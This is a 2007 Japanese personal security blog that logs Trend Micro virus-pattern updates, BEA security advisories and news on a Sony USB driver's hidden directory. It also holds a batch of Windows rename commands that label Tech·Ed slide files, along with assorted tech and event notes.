Hatena::ブログ(Diary)

まっちゃだいふくの日記★とれんどふりーく★ このページをアンテナに追加 RSSフィード Twitter

カレンダー
<< 2007/08 >>
1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 30 31

このBlogは個人的に収集しているセキュリティ情報や製品情報について書いています。
また、トレンドマイクロ製品+パターン+ウィルスの情報も提供しています。
Trendmicro Japanがイエローアラート以上を出した場合いろいろな情報を提供するようにしています。
Matcha's Security Blogにてセキュリティ情報(英語)も提供しています
各ウイルスバスターの不具合やBlogでの反応:クラウド(2014)クラウド(2013)20122011続き201020092008
日本の情報セキュリティ勉強会ポータルサイト

2007年08月31日(金曜日) 二百十日

ripjyr2007-08-31

[][]パターンアップ-4.683.00

Trendmicroのパターンがアップしました。

パターン番号:4.683.00

イエローアラート:なし
アップデート理由:WORM_STRATION.RC緊急対応
新規対応
 緊急対応
  WORM_STRATION.RC
亜種対応
 特筆なし


[]マイクロソフト、大阪・枚方で子供向けインターネット教室

2006年11月からやっているMicrosoftの小学生と親のためのインターネット教室(セキュリティも含む)らしいです。

マイクロソフトでは、「小学生のインターネット利用が増加するなか、児童ポルノ、出会い系自殺やいじめなどの子供たちを狙うインターネット犯罪も増加している。子供を守るには、親が常日頃からチェックすることが必要だが、子供がアクセスしているページを常時確認するのは難しいのが現状。子供自身に正しい知識を植え付けることが大切だ」と語る。

マイクロソフトでは、昨年(2006年)11月から、インターネット安全教室の開催を希望する小学校や商工会議所を募集。これまでに東京神奈川兵庫の小学校で7回に渡り開催してきた。今年11月までに12カ所で開催する予定。

ハンズオンじゃないですが、実際にコンテンツを見て操作して学ぶ形らしいです。

セミナーでは、MSNが同社サイト上で提供している「親子で学ぶインターネット安全教室」のコンテンツを使用。子供が実際に操作をしながら、学ぶスタイルをとっている。


[]2007-08-30 - モーグルとカバとパウダーの日記

オプトインは送ることを許可されたもので、勝手に拒否できるのか?って話をid:stealthinuさんに振ったら、返信くれました。

迷惑メール対策で、オプトインの対応ってどうするんだろ・・・・手法はスパムなのにオプトインは送ってもかまわない・・・

まぁ、自衛のために止めることは問題ないのかな?

やっぱりホワイトリストですか・・・そうですよね。

現時点でも、オプトインでもスパムと全く同じ手法で送られたら、誤検出してしまいますので、それはホワイトリストで対応するしかないです。

基本的にネットワークサービス事業者は、ユーザに無断で、メールを条件により「拒否」するというのは、ほぼ許されていない状況なので、ユーザーが任意でスパムフィルタをオンにするようになってると思います。

経済産業省の立場(経済の発展や企業)と総務省(通信)で相互に連携がとれてたらいいんですが、今の段階ではとれてなさそう・・・

あとこの規制が、今まで迷惑メールについてやっていた総務省ではなく、経済産業省がやってる、ということが興味深い。

これってやっぱり省庁の縄張り争いという意味もあるのだろうか?

規制が強化されるのはこっちとしてはありがたいんだけど、意味なく二つの省庁で同じことをやろうとするのは、なんか無駄だなあと思ってしまうので。


[][]パターンアップ-4.681.00

Trendmicroのパターンがアップしました。

パターン番号:4.681.00

イエローアラート:なし
アップデート理由:定期アップデート
新規対応
 特筆なし
亜種対応
 MS06-040
  WORM_AKBOT.E


[]半径5メートルの人がアマゾンを読んで

システム管理の話関係ないやんw

よろしくおねがいします>柳原さん


[]Microsoft Tech・Ed 2007 Yokohama

なんとなく、誰と無く。

ぱしりんさん追記Thanx!(スペシャルセッションを忘れてました)14:09追加
rename SP-01.pptx "SP-01-IT アーキテクトを目指すあなたに贈るスペシャル セッション「ザ・ロードマップ 〜 マイクロソフト製品の現在・そして未来 〜」.pptx" 
rename SP-02.pptx "SP-02-アプリケーション アーキテクトを目指すあなたに贈るスペシャル セッション「LINQ to the Future 〜 LINQ が創る次世代型データ処理技術 〜」.pptx" 
rename T1-301.pptx "T1-301-2007 Office system による複合アプリケーション アーキテクチャ設計.pptx"
rename T1-302.pptx "T1-302-ITIL に基づいたマイクロソフト プラットフォームの運用最適化と IT 統制の実現 - Microsoft Operations Framework -.pptx"
rename T1-303.pptx "T1-303-さらに進化した BizTalk Server 2006 R2 のコンセプト.pptx"
rename T1-304.pptx "T1-304-Windows Communication Foundation アダプタと BizTalk Server 2006 R2 によるサービスの構築と連携.pptx"
rename T1-305.pptx "T1-305-.NET Framework 3.5 時代のコンポジット UI アプリケーションのパターンと実装.pptx"
rename T1-306.pptx "T1-306-Windows Communication Foundation による Web 2.0 的「Web スタイル」サービスの開発 - REST、POX、JSON と RSS/Atom.pptx"
rename T1-307.pptx "T1-307-Windows CardSpace によるセキュアなアプリケーション構築手法:ASP.NET、Windows Communication Foundation.pptx"
rename T1-308.pptx "T1-308-Dynamic Systems Initiative 〜 仮想化と自動化の波が来る 〜.pptx"
rename T1-309.pptx "T1-309-データベース アーキテクトのためのスケール アウト戦略.pptx"
rename T1-401.pptx "T1-401-ソフトウェア ファクトリの設計と構築.pptx"
rename T1-403.pptx "T1-403-Windows Communication Foundation のアーキテクチャと基本的な拡張手法.pptx"
rename T1-501.pptx "T1-501-俯瞰的な視点で参照アーキテクチャを設計するための極意.pptx"
rename T2-301.pptx "T2-301-Windows Vista と Windows Server 2008 の新しいボリューム ライセンス認証.pptx"
rename T2-302.pptx "T2-302-Windows Vista へのアプリケーション移行:Microsoft SoftGrid の仮想化テクノロジ.pptx"
rename T2-303.pptx "T2-303-企業における Internet Explorer 7 の活用と留意点.pptx"
rename T2-304.pptx "T2-304-Windows Vista:JIS2004 と Unicode.pptx"
rename T2-305.pptx "T2-305-Windows Server 2008 の Active Directory ドメイン サービス.pptx"
rename T2-306.pptx "T2-306-管理者不足とセキュリティに悩む小規模オフィスへの Active Directory 展開プラン 〜 Windows Server 2008 の新機能「読み取り専用ドメイン コントローラ (RODC)」がもたらすメリット.pptx"
rename T2-307.pptx "T2-307-Active Directory と Microsoft Identity Lifecycle Manager 2007 による ID 管理.pptx"
rename T2-308.pptx "T2-308-Windows Server 2008 のサーバー管理テクノロジ.pptx"
rename T2-309.pptx "T2-309-こうやって実践しよう! システム管理者のための IIS 7.0 featuring Windows Server 2008.pptx"
rename T2-310.pptx "T2-310-Microsoft Windows Rights Management Services (RMS) と Active Directory フェデレーション サービス (AD FS) を使用したセキュアな環境構築.pptx"
rename T2-311.pptx "T2-311-Virtualization Solution Scenario:仮想化環境の構築と管理.pptx"
rename T2-312.pptx "T2-312-Windows Server 2003 Clustering から進化した Windows Server 2008 Failover Clustering の新機能.pptx"
rename T2-313.pptx "T2-313-Windows PowerShell:サーバー管理における PowerShell の活用方法.pptx"
rename T2-314.pptx "T2-314-Windows Server 2008 の新しいターミナル サービス概要.pptx"
rename T2-315.pptx "T2-315-Windows Server 2008 ネットワーク アクセス保護とネットワーク ポリシー サーバー概要.pptx"
rename T2-401.pptx "T2-401-Windows Vista のグループ ポリシー詳細とトラブル シューティング.pptx"
rename T2-402.pptx "T2-402-Windows Vista の展開と運用:Microsoft Solution Accelerator for Business Desktop Deployment (BDD) 2007.pptx"
rename T2-403.pptx "T2-403-Windows Vista および Windows Server 2008:ユーザー アカウント制御とアプリケーションの互換性.pptx"
rename T3-301.pptx "T3-301-.NET における動的言語への取り組み.pptx"
rename T3-302.pptx "T3-302-Visual Studio 2008 概要.pptx"
rename T3-303.pptx "T3-303-Expression Blend を活用した Windows Presentation Foundation アプリケーションの構築.pptx"
rename T3-304.pptx "T3-304-VB ユーザーのための Visual Studio 2008 による開発.pptx"
rename T3-305.pptx "T3-305-Visual Studio 2008 における Visual C# の新機能.pptx"
rename T3-306.pptx "T3-306-開発者のための Windows Server 2008 対策 〜 プレミアム デモンストレーション 〜.pptx"
rename T3-307.pptx "T3-307-.NET Framework 3.5 概要.pptx"
rename T3-308.pptx "T3-308-Visual Studio 2008 における Visual Studio Team System の新機能.pptx"
rename T3-309.pptx "T3-309-Expression Studio でデザインする Silverlight アプリケーション.pptx"
rename T3-310.pptx "T3-310-ASP.NET 開発者のための Internet Information Services 7.0 概説.pptx"
rename T3-311.pptx "T3-311-Visual Studio 2008 における Web アプリケーション構築の新機能.pptx"
rename T3-312.pptx "T3-312-.NET Framework 3.0 によるアプリケーション構築.pptx"
rename T3-402.pptx "T3-402-チーム開発のベスト プラクティス 〜 Team System の実践的活用法.pptx"
rename T3-403.pptx "T3-403-ジニアス平井の Visual Studio Team System のススメ.pptx"
rename T3-404.pptx "T3-404-Windows Presentation Foundation アプリケーションの最適化.pptx"
rename T3-405.pptx "T3-405-AJAX に対応した ASP.NET アプリケーション開発.pptx"
rename T4-201.pptx "T4-201-Windows Mobile 6 の新機能.pptx"
rename T4-202.pptx "T4-202-〜 マイクロソフト自社事例 〜 Microsoft 全従業員 14 万人が利用する Exchange Server 2007 の導入設計と運用.pptx"
rename T4-203.pptx "T4-203-〜 ソフトウェア プラス サービス 〜 Exchange Hosted Services - 電子メールのフィルタリング、アーカイブ、利用継続性および暗号化.pptx"
rename T4-204.pptx "T4-204-〜 ここから始める Exchange Server 2007 〜 インストールと管理、Exchange Server 2007 SP1 の紹介.pptx"
rename T4-205.pptx "T4-205-Office Communications Server 2007 アーキテクチャと設計.pptx"
rename T4-301.pptx "T4-301-Windows Mobile 6 によるモバイル コラボレーションの進化.pptx"
rename T4-302.pptx "T4-302-Microsoft Office SharePoint Server 2007 パフォーマンスの実際.pptx"
rename T4-303.pptx "T4-303-Microsoft Visual Studio Tools for Office を使った Office Business Applications の開発.pptx"
rename T4-304.pptx "T4-304-Excel Services のアーキテクチャと開発者のシナリオ.pptx"
rename T4-305.pptx "T4-305-Microsoft SharePoint Products および Technologies 2007 の高可用性とディザスタ リカバリ.pptx"
rename T4-306.pptx "T4-306-Microsoft SharePoint Products および Technologies 2007:管理アーキテクチャと展開.pptx"
rename T4-307.pptx "T4-307-Microsoft Office SharePoint Server 2007 における検索:カスタマイズと拡張.pptx"
rename T4-308.pptx "T4-308-Office Open XML File Formats の概要および開発シナリオ/業務ソリューションへの応用.pptx"
rename T4-309.pptx "T4-309-Microsoft Office Visio Professional 2007 を活用した、IT システムやプロセスの可視化/分析.pptx"
rename T4-310.pptx "T4-310-Exchange Server 2007 可用性と障害対策.pptx"
rename T4-312.pptx "T4-312-Office Communications Server 2007 概要 〜 進化する統合コミュニケーション.pptx"
rename T4-313.pptx "T4-313-Office Communications Server 2007 〜 新たな VoIP シナリオ.pptx"
rename T4-314.pptx "T4-314-Microsoft Exchange Server 2007 展開と設計.pptx"
rename T4-315.pptx "T4-315-Microsoft Office InfoPath 2007 と InfoPath Forms Services を使った電子フォーム ソリューションの開発と展開.pptx"
rename T4-316.pptx "T4-316-Microsoft Visual Studio Tools for Office アーキテクチャと実践.pptx"
rename T4-401.pptx "T4-401-.NET Compact Framework 2.0 SP2:新しい Windows Mobile 6 API の活用.pptx"
rename T4-403.pptx "T4-403-Visual Studio 2005 extensions for Windows SharePoint Services 3.0 - 3 分でできる SharePoint 開発.pptx"
rename T4-405.pptx "T4-405-Microsoft SharePoint Products and Technologies 2007 におけるワークフロー:開発者向け詳説.pptx"
rename T5-201.pptx "T5-201-〜 マイクロソフト自社事例 〜 Microsoft 社内におけるアイデンティティ管理.pptx"
rename T5-202.pptx "T5-202-IT ガバナンス実現の為に強化された、System Center Configuration Manager 2007 の新機能解説.pptx"
rename T5-203.pptx "T5-203-System Center Data Protection Manager (DPM) 2007 による、SQL Server、Exchange Server、およびクライアント PC のデータ保護.pptx"
rename T5-204.pptx "T5-204-System Center Operations Manager 2007 を活用した、サーバーからクライアントに至る包括的な管理、監査の実現手法について.pptx"
rename T5-205.pptx "T5-205-ITIL に基づいた IT サービス運用最適化の中核を担う新製品:System Center Service Manager .pptx"
rename T5-301.pptx "T5-301-Windows Server Update Services 3.0 の移行と展開、運用について.pptx"
rename T5-302.pptx "T5-302-System Center Virtual Machine Manager による仮想環境の統合管理.pptx"
rename T5-303.pptx "T5-303-中堅企業 IT 管理者のための System Center Essentials 活用術.pptx"
rename T5-304.pptx "T5-304-Forefront Client Security のテクニカル概要.pptx"
rename T5-305.pptx "T5-305-Intelligent Application Gateway 2007 (IAG 2007) の企業ネットワークにおける展開と管理.pptx"
rename T5-306.pptx "T5-306-Internet Explorer 7 のセキュリティ新機能.pptx"
rename T5-307.pptx "T5-307-Forefront Security for Exchange Server:Exchange Server 2007 のより効率的かつ効果的なウイルス スキャニング.pptx"
rename T5-308.pptx "T5-308-Forefront Security for SharePoint:Microsoft Office SharePoint Server 2007 のウイルス スキャニング とコンテンツ フィルタリング.pptx"
rename T6-301.pptx "T6-301-Microsoft Dynamics CRM で明日からできる BI - 顧客情報/営業情報の見える化の方向性 -.pptx"
rename T6-302.pptx "T6-302-CRM アプリケーション開発プラットフォームとして活用する Microsoft Dynamics CRM 3.0.pptx"
rename T6-304.pptx "T6-304-SQL Server 2005 Integration Services による企業内データ統合ベスト プラクティス.pptx"
rename T6-305.pptx "T6-305-SQL Server 2005 と SharePoint Server 2007 との統合による全社員 BI 基盤の構築.pptx"
rename T6-306.pptx "T6-306-Office PerformancePoint Server 2007:社員力を強化する、統合パフォーマンス管理ソリューション.pptx"
rename T6-307.pptx "T6-307-Office System によるデータ マイニング プロセス.pptx"
rename T6-308.pptx "T6-308-SQL Server 2008:Database Engine としての Data Warehousing 機能の概要.pptx"
rename T6-309.pptx "T6-309-ADO.NET Entity Framework の概要およびアプリケーションでの適応方法.pptx"
rename T6-310.pptx "T6-310-SQL Server 2008:Enterprise Data Platform としてのその実力.pptx"
rename T6-401.pptx "T6-401-SQL Server 2005 パフォーマンス チューニングとモニタリング.pptx"
rename T6-402.pptx "T6-402-SQL Server Always-On Technologies:高度なインデックス戦略.pptx"
rename T6-403.pptx "T6-403-SQL Server 2005 データベースの定期メンテナンスによるパフォーマンス向上.pptx"
rename T6-404.pptx "T6-404-SQL Server 2005 Analysis Services パフォーマンス チューニングとスケーリング - SP2 検証 -.pptx"


[]Microsoft Tech・Ed 2006 Yokohama

なんとなく、誰と無く>2006年も作ってみた

rename T1-301.pps "T1-301-スマート クライントのための最新アーキテクチャ構築技法.pps"
rename T1-302.pps "T1-302-SaaS (Software as a Service) 入門.pps"
rename T1-303.pps "T1-303-IT アーキテクトとプロジェクトマネジャの役割・責任.pps"
rename T1-401.pps "T1-401-Software Factories による開発の実践.pps"
rename T1-402.pps "T1-402-DSL Tools 内部解説.pps"
rename T2-301.pps "T2-301-SharePoint 製品とテクノロジにおけるインフラストラクチャ トピックス:管理アーキテクチャと展開計画 開発ライフサイクルへのセキュリティ運用の組み込み.pps"
rename T2-302.pps "T2-302-the 2007 Microsoft Office system と Windows SharePoint Services (バージョン 3) のワークフロー開発.pps"
rename T2-303.pps "T2-303-the 2007 Microsoft Office system クライアントアプリケーションの展開と新しいファイル形式への移行.pps"
rename T2-304.pps "T2-304-Visual Studio 2005 Tools for Microsoft Office (VSTO) バージョン 3.0 機能概要.pps"
rename T2-305.pps "T2-305-SharePoint Designer 2007 を利用した Lotus Notes アプリケーションの再構築.pps"
rename T2-306.pps "T2-306-Groove 2007 アーキテクチャと開発手法解説.pps"
rename T2-307.pps "T2-307-the 2007 Microsoft Office system: 新しいユーザー インターフェイスのための開発モデル.pps"
rename T2-401.pps "T2-401-Microsoft Office InfoPath 2007/Forms Server 2007 による電子フォームソリューション開発手法.pps"
rename T2-402.pps "T2-402-Windows Vista の展開技術を使った PC 環境の標準化手法 前編.pps"
rename T2-403.pps "T2-403-Internet Explorer 7 の機能概要と評価のポイント.pps"
rename T2-404.pps "T2-404-企業内で活用する Windows Desktop Search ソリューション.pps"
rename T2-405.pps "T2-405-Windows Vista における新しいクライアント PC の管理技術.pps"
rename T2-406.pps "T2-406-既存アプリケーションの Windows Vista 対応方法.pps"
rename T2-407.pps "T2-407-Windows Vista の展開技術を使ったPC環境の標準化手法 後編.pps"
rename T3-301.pps "T3-301-Microsoft Dynamics CRM 3.0 の概要.pps"
rename T3-302.pps "T3-302-あなたのビジネスにあわせて Microsoft Dynamics CRM 3.0 をカスタマイズ.pps"
rename T3-303.pps "T3-303-Integration Services Deep Dive - パフォーマンス検証から -.pps"
rename T3-304.pps "T3-304-体験サイトから学ぶ Reporting Services 実践事例.pps"
rename T3-305.pps "T3-305-Analysis Services Deep Dive with Excel 2007.pps"
rename T3-306.pps "T3-306-SQL Server 2005 SQL CLR 実践手法.pps"
rename T3-307.pps "T3-307-開発プラットフォームとしての SQL Server 120% 活用術.pps"
rename T3-308.pps "T3-308-松本美穂の「動的管理ビューでいってみよう」.pps"
rename T3-309.pps "T3-309-SQL Server 2005 への移行事例 Project Real.pps"
rename T3-310.pps "T3-310-パーティショニング機能を駆使した VLDB マネージメント.pps"
rename T3-401.pps "T3-401-Office CPM (企業業績管理) ソリューションの開発と展開.pps"
rename T3-402.pps "T3-402-イザという時に困らないために - SQL Server 障害復旧 -.pps"
rename T3-403.pps "T3-403-Dr, K's SQL Server チューニング研修.pps"
rename T3-404.pps "T3-404-SQL Server Always On Technologies 「データベース ミラーリング」 徹底検証.pps"
rename T4-301.pps "T4-301-〜メッセージシステムの災害対策を考える〜 Exchange Server 2007 障害対策機能.pps"
rename T4-302.pps "T4-302-〜堅牢なセキュリティと生産性向上を両立する〜 Exchange Server 2007 概要.pps"
rename T4-303.pps "T4-303-Microsoft Office Live Communications Server 2005 と Microsoft Office Communicator 2005: テクニカル概要.pps"
rename T4-304.pps "T4-304-Exchange Server 2007 導入、展開、移行手法.pps"
rename T4-305.pps "T4-305-〜Better Together〜 Exchange Server 2007 と the 2007 Microsoft Office system の連携.pps"
rename T4-306.pps "T4-306-〜刷新されたアーキテクチャ〜 Exchange Server 2007 のアーキテクチャとシステム構成.pps"
rename T4-307.pps "T4-307-Windows Mobile 5.0 ビジネス活用術.pps"
rename T4-308.pps "T4-308-Exchange Server 2007 ユニファイド メッセージング 詳細.pps"
rename T4-309.pps "T4-309-〜電子メールの内部統制環境を実現〜 Exchange Server 2007 のコンプライアンス対策機能.pps"
rename T4-401.pps "T4-401-Office Communicator 2005 を用いたテレフォニー統合と Voice Over IP.pps"
rename T5-301.pps "T5-301-.NET Framework 2.0 におけるトランザクションの実装 〜 System.Transactions.pps"
rename T5-302.pps "T5-302-実践! BizTalk Server 2006 - 設計! 開発! 運用! Part 1.pps"
rename T5-303.pps "T5-303-.NET Framework 3.0 概要.pps"
rename T5-304.pps "T5-304-実践! BizTalk Server 2006 - 設計! 開発! 運用! Part 2.pps"
rename T5-305.pps "T5-305-実践! BizTalk Server 2006 - パフォーマンスの最適化.pps"
rename T5-306.pps "T5-306-.NET Framework および .NET アプリケーションの配置と管理、およびその注意事項.pps"
rename T5-307.pps "T5-307-ビジネスゴールを達成するエクスペリエンス提供のためのテクノロジー選択.pps"
rename T5-308.pps "T5-308-Windows Forms: エンタープライズ対応のフォームを持つアプリケーションの構築.pps"
rename T5-309.pps "T5-309-Visual Studio 2005 Team Edition 概要.pps"
rename T5-310.pps "T5-310-Visual Basic 2005: アプリケーション開発の Tips&Tricks.pps"
rename T5-311.pps "T5-311-C++: C++ /CLI プログラミング.pps"
rename T5-312.pps "T5-312-Windows Presentation Foundation:Windows アプリも Web アプリも全部まとめて WPF.pps"
rename T5-313.pps "T5-313-Visual Studio 2005 Team Foundation Server: ソフトウェア開発プロジェクトに対するバージョン管理、作業項目追跡、チームビルドの適用.pps"
rename T5-315.pps "T5-315-ASP.NET: Web 標準および情報アクセシビリティ JIS を考慮した ASP.NET 2.0 の活用方法.pps"
rename T5-317.pps "T5-317-Visual Studio Team System による ASP.NET 2.0 Web アプリケーションのテスト技法.pps"
rename T5-318.pps "T5-318-マイクロソフト テクノロジーによる RFID システムの実装.pps"
rename T5-319.pps "T5-319-Windows フォームから Windows Presentation Foundation への移行.pps"
rename T5-320.pps "T5-320-Visual Studio Team Edition for Database Professionals 概要.pps"
rename T5-321.pps "T5-321-Windows Mobile 5.0 アプリケーション開発.pps"
rename T5-322.pps "T5-322-Windows Communication Foundation によるセキュアな分散アプリケーションの構築、および Windows CardSpace (コードネーム ”InfoCard”) の実装.pps"
rename T5-323.pps "T5-323-IIS 6: インターネットを考慮したセキュア設定.pps"
rename T5-324.pps "T5-324-ASP.NET と Ajax フレームワーク 「Atlas」 を利用したリッチ Web ユーザー エクスペリエンス アプリケーションの開発.pps"
rename T5-401.pps "T5-401-Windows Communication Foundation: リライアブルでトランザクテッドな分散サービスの構築.pps"
rename T5-402.pps "T5-402-Windows Workflow Foundation: フローモデルの解説とアプリケーションへの適応.pps"
rename T5-404.pps "T5-404-Visual Studio 2005 Team System および Microsoft Solutions Framework: アジャイルまたは CMMI プロセスの実装.pps"
rename T6-301.pps "T6-301-Microsoft Operations Manager 2005 による Active Directory 環境の高度な監視.pps"
rename T6-302.pps "T6-302-Systems Management Server 2003 展開と活用のベスト プラクティス.pps"
rename T6-303.pps "T6-303-Microsoft Operations Manager 2005 構築と利用のベスト プラクティス.pps"
rename T6-304.pps "T6-304-Data Protection Manager を利用したデータ管理方法.pps"
rename T6-305.pps "T6-305-Windows Vista におけるマルウェア対策技術.pps"
rename T6-306.pps "T6-306-Windows Vista のセキュリティ運用手法.pps"
rename T6-307.pps "T6-307-開発ライフサイクルへのセキュリティ運用の組み込み.pps"
rename T6-308.pps "T6-308-Forefront 包括的で統合された企業向けセキュリティ ソリューション (Microsoft Antigen、ISA Server 2006).pps"
rename T6-309.pps "T6-309-Windows Compute Cluster Server 2003 の展開と運用.pps"
rename T6-310.pps "T6-310-ID&アクセス管理のロードマップ.pps"
rename T6-311.pps "T6-311-Windows Server ”Longhorn” 〜 OS の進化〜.pps"
rename T6-313.pps "T6-313-Windows Compute Cluster Server 2003 概要.pps"
rename T6-316.pps "T6-316-安全なメッセージング ソリューション Exchange Hosted Services、MS Antigen から Outlook まで.pps"
rename T6-317.pps "T6-317-Windows Server ”Longhorn” の Network Access Protection (NAP) の技術概要と展開方法.pps"
rename T6-318.pps "T6-318-進化した IIS 7.0 のご紹介と最新アップデート.pps"
rename T6-319.pps "T6-319-マイクロソフトが提供する仮想化技術とロードマップ.pps"
rename T6-401.pps "T6-401-セキュアなアプリケーションの開発手法.pps"


PasiriPasiri 2007/09/01 01:57 2006年版をソートしてください(w

ripjyrripjyr 2007/09/01 05:00 ↑ソートしてみましたw

2007年08月30日(木曜日)

ripjyr2007-08-30

[][]spywareパターンアップ-527.00

Trendmicroのspywareパターンがアップしました。

パターン番号:0.527.00

アップデート理由:定期アップデート


[][]パターンアップ-4.679.00

>Trendmicroのパターンがアップしました。

パターン番号:4.679.00

イエローアラート:なし
アップデート理由:定期アップデート
新規対応
 MS06-067
  JS_HACK.AG
亜種対応
 特筆なし


2007年08月29日(水曜日) 文化財保護法施行記念日

[]お探しのページが見つかりませんでした | nikkei BPnet 〈日経BPネット〉:日経BPオールジャンルまとめ読みサイト

動作時でも1Wでアイドル時は、0.1Wですか、すごい省電力だ。

台湾VIA Technologies, Inc.は、同社の超低消費電力の86系マイクロプロセサのシリーズ「Eden ULV(ultra low voltage)」に、500MHzで動作する製品を加えたと発表した。消費電力は動作時で1W、アイドル時で0.1Wといずれも非常に小さい。ファンなど冷却器が不要で、小型携帯端末や組み込み機器など幅広い用途に向けるという。


[]F-Secure: 法人向セキュリティ/プライバシー ソリューション

F-Secureのウイルス対策最前線セミナーがあるそうです。でも関西ないし・・・この県の選択はあえて、マイナー県ですかね。

「F-Secureウィルス対策最前線セミナー2007」では、昨今の特定ターゲットに的を絞ったネットワーク犯罪や機密情報漏洩事件を踏まえ、コンピュータセキュリティの現状を解説します。また、ボットによる不正なアクセスを検知するソリューションや、個人所有PCからの情報漏洩に対応するソリューション、またインターネットゲートウェイにおけるソリューション等を紹介します。

    ● 最新のセキュリティ動向と対策

        ・情報漏洩危機、業務停止危機

        ・ミッコ・ヒッポネンのセキュリティ総括メッセージ

        ・「F-Secureクライアントセキュリティ」管理の実演

        ・Winny防御デモンストレーション

    ● F-Secureソリューションのご紹介

        ・「F-Secureクライアントセキュリティ Ver7.10」

        ・WindowsウィルスLinuxサーバゲートウェイで防ぐ

        ・「F-Secure包括パックシリーズ」

        ・問題改善事例のご紹介

    ● セキュリティ相談会

        ・セキュリティでお困りのお客様からのご質問にお答えします


[]Ustream.tvは勉強会の必須ツールになった感 - うさぎ文学日記

規制できるのか?大丈夫か?気になるところはいっぱいですが、捕まらないプレゼンをしてもらえばいいのかな?

あとは、オフレコ対策どうするか・・・

噂のPort801勉強会にUstream.tv経由で参加してきました。Ustream.tvのほぼライブ中継とIRC的なチャットの組み合わせのおかげで、リアルにその場にいませんでしたが参加している気分まんまんでした。

実際の参加者は25人ぐらいだったみたいだけど、Ustreamで観ていた人の数は70人超になっていた。中継のMAXがどのくらいまで耐えられるのかはわかりませんが、小規模な勉強会なら十分に活用できそう。

Ustreamの機能で同時に録画もできて、あとで観ることができるから、アーカイブを作るのにもいいね。

おもしろそうですね。おもしろそうですが、オフレコ大丈夫か???

今後、勉強会開く人は、Ustream.tv使うといいよ。


[][]パターンアップ-4.677.00

Trendmicroのパターンがアップしました。

パターン番号:4.677.00

イエローアラート:なし
アップデート理由:定期アップデート
新規対応
 特筆なし
亜種対応
 特筆なし


[]中越沖地震:ミスチル桜井さんら、新曲収益で復興応援−事件:MSN毎日インタラクティブ

はるまついぶきの配信をPCと携帯で行って収益の一部を義援金にするそうです。

「はるまついぶき」は春を待つ気配を、復興を祈る気持ちになぞらえ、人を勇気付ける歌詞となっている。音楽プロデューサー小林武史さんら「ap bank」スタッフ7人がボランティアで中越沖地震の被災地を訪れた際、被災者の姿や、使用停止命令の出た柏崎刈羽原発を見て、収益の一部を義援金に充てたいと考えたという。

つま恋の最終日が中越沖地震だったんですね。その足で新潟炊き出しをされたそうです。すごい。この行動力。

そうしてap bank fes'07が始まりましたが、みなさんご存知の通り、3日間中、前半2日間が台風4号の影響で中止になってしまった。

最終日は素晴らしい一日になったとは思うけれど、終った後は、やるせない思いが残ったままだった。ちょうど最終日3日目の朝に新潟の方で地震が起こった。

つま恋から帰ってきたのがフェスが終った次の日(地震が起こって2日目の夕方)だったのですが、まだ台風の影響が残っていて、東京も大雨だった。

新潟も大雨だということをニュースで知り、被災地の方のやるせない思いが伝わって来るようだった。

すでに、その日の朝、スタッフからkurkkuでフェスで出すはずだったカレーが数千食、冷凍の状態で残っているということをメールで知らされていた。

フェスのために借りた道具(保冷車や鍋や釜やプロパンガスなど)を再び借りれば柏崎の方に行ってカレーをふるまうことができることが、スタッフと話し合ってわかった。

新潟の方の友人などから調べてもらったところ、柏崎ボランティアセンターと話がつながった。

櫻井さんは、いつもながら、短いながらも心を打つ言葉ですね。なんか涙でそうでした。

ap bankに携わることが決まったとき

「自分の仕事が自分以外の誰かの役にたっている」

そう思えることがとても嬉しかった。

雪に覆われた春を待つ息吹のように、再生を待っている人たち、

また、その人たちを遠くから想っている人たちに、

この歌が届いていくことを願ってます。


[]Dev2Dev Online: Security Advisories and Notifications

Beaから6件のセキュリティアドバイザリが出ています。

BEA07-176.00とか、「Server may select a cipher suite that uses a null cipher for SSL communication with SSL clients」Man In The Middleで危険じゃないかな・・・
BEA07-87.02 「A malicious client can cause threads to hang on the server.」が一番危険か。
詳細はばるちゃんにお願いしよっとw

DateNumberTitleTypeThreatSeverityProducts
2007/8/28BEA07-178.00Java Secure Socket Extension Does Not Correctly Process SSL/TLS Handshake Requests Resulting in a Denial of Service (DoS) Condition advisory High High JRockit R27.3.1 or prior using 1.6 .0_1 or earlier
JRockit R27.3.1 or prior using 1.5.0 Updates 7, 8, 9, 10, and 11
JRockit R27.3.1 or prior using 1.4.2 Updates 11, 12, 13, and 14
2007/8/28BEA07-177.00Multiple Security Vulnerabilities in the Java Runtime Environment advisory High High JRockit R27.3.1 or prior using 1.6.0_1 or earlier
JRockit R27.3.1 or prior using 1.5.0 _11 or earlier
JRockit R27.3.1 or prior using 1.4.2 _14 or earlier
JRockit 7.0 SP6 RP1 or prior using JRE 1.3.1_20 or earlier
2007/8/28BEA07-176.00Server may select a cipher suite that uses a null cipher for SSL communication with SSL clients advisory Medium Medium WLS 10.0
WLS 9.2 (-MP1)
WLS 9.1
WLS 9.0
WLS 8.1 (-SP6)
WLS 7.0 (-SP7)
2007/8/28BEA07-175.00SSL clients may not find all possible cipher suites resulting in use of the default null cipher (no encryption) advisory Medium Medium WLS 10.0
WLS 9.2 (-MP2)
WLS 9.1
WLS 9.0
WLS 8.1 (SP2-SP6)
WLS 7.0 SP7
2007/8/28BEA07-148.01Malformed headers may cause high disk consumption advisory High Medium WLS 7.0 (-SP7)
WLS 6.1 (-SP7)
2007/8/28BEA07-87.02A malicious client can cause threads to hang on the server. advisory High High WLS 8.1 (-SP4)
WLS 7.0 (-SP7)
WLS 6.1 (-SP7)


[]ITmedia エンタープライズ:ソニーのUSBメモリに「rootkit的」技術:

見えないですね(何

これらUSBメモリに付属するソニーの指紋認識ソフト「MicroVault USM-F」のドライバは、「c:\windows\」のディレクトリの下に隠れる形でインストールされるという。Windowsディレクトリ内のファイルとサブディレクトリを一覧表示しても、Windows APIではこのディレクトリファイルが表示されない。

ディレクトリを作成しようとしても、ディスクがいっぱいですって、言われるんですよね。指紋認証に必要なファイルがディスクいっぱいに満載してたりしてますよねw

しかし、ディレクトリ名を知っていれば、コマンドプロンプトを使ってこの隠しディレクトリに入り込み、新しい隠しファイルを作ることも可能だ。しかも一部のウイルス対策ソフトでは、このディレクトリ内のファイルは検出されない。つまり、理論的にはマルウェアがこの隠しディレクトリを利用することが可能になるとF-Secureは分析する。


[]窓の杜 - 【NEWS】定番のエクスプローラ風圧縮・解凍ソフト「Explzh」がフリーソフト化:

kikuz0uさん経由

Explzhがフリーソフト化されたそうです。こりゃーいいや。

